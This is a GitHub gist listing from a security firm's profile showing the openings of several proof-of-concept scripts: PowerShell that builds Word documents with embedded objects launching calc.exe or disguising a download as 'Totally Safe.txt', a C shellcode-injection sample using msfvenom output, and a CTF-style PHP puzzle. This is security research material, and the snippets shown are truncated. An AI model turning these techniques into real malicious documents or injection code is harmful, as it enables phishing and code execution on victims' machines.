Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View securifybv's full-sized avatar

Securify securifybv

View GitHub Profile
securifybv / Forms.HTML.ps1
Last active September 10, 2021 09:48
PowerShell script that creates a Word document with an embedded Forms.HTML:Image.1 object that when clicked will cause Calculator to be opened. See also:
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
$progid = 'Forms.HTML:Image.1'
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
$html = '<x type="image" src="" action="file:///c|/windows/system32/calc.exe">'
# load assemblies for changing the docx (zip) file
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')
securifybv / Shell.Explorer open file.ps1
Last active April 8, 2023 06:46
PowerShell script that creates a Word document containing an embedded Internet Explorer object. It uses Packager to create an object that looks like an embedded file, clicking the object will trigger a file download. See also:
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\WebBrowser.docx'
# path to open
#$path = 'c:\windows\system32\calc.exe'
$path = ''
# the temp file is used for creating the icon
$tmpfile = "$env:TEMP\Totally Safe.txt"
securifybv / NotCreateRemoteThread.c
Last active September 20, 2021 20:22
Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
This badass hidden server admin created a tool to quickly get and wipe
his bitcoin keys in case of a raid. It's super secure: it has a secret key,
a brute-force lockout mechanism, and even uses signatures.
// Make sure all variables are of proper format
foreach (['key','call','signature','iv'] as $key)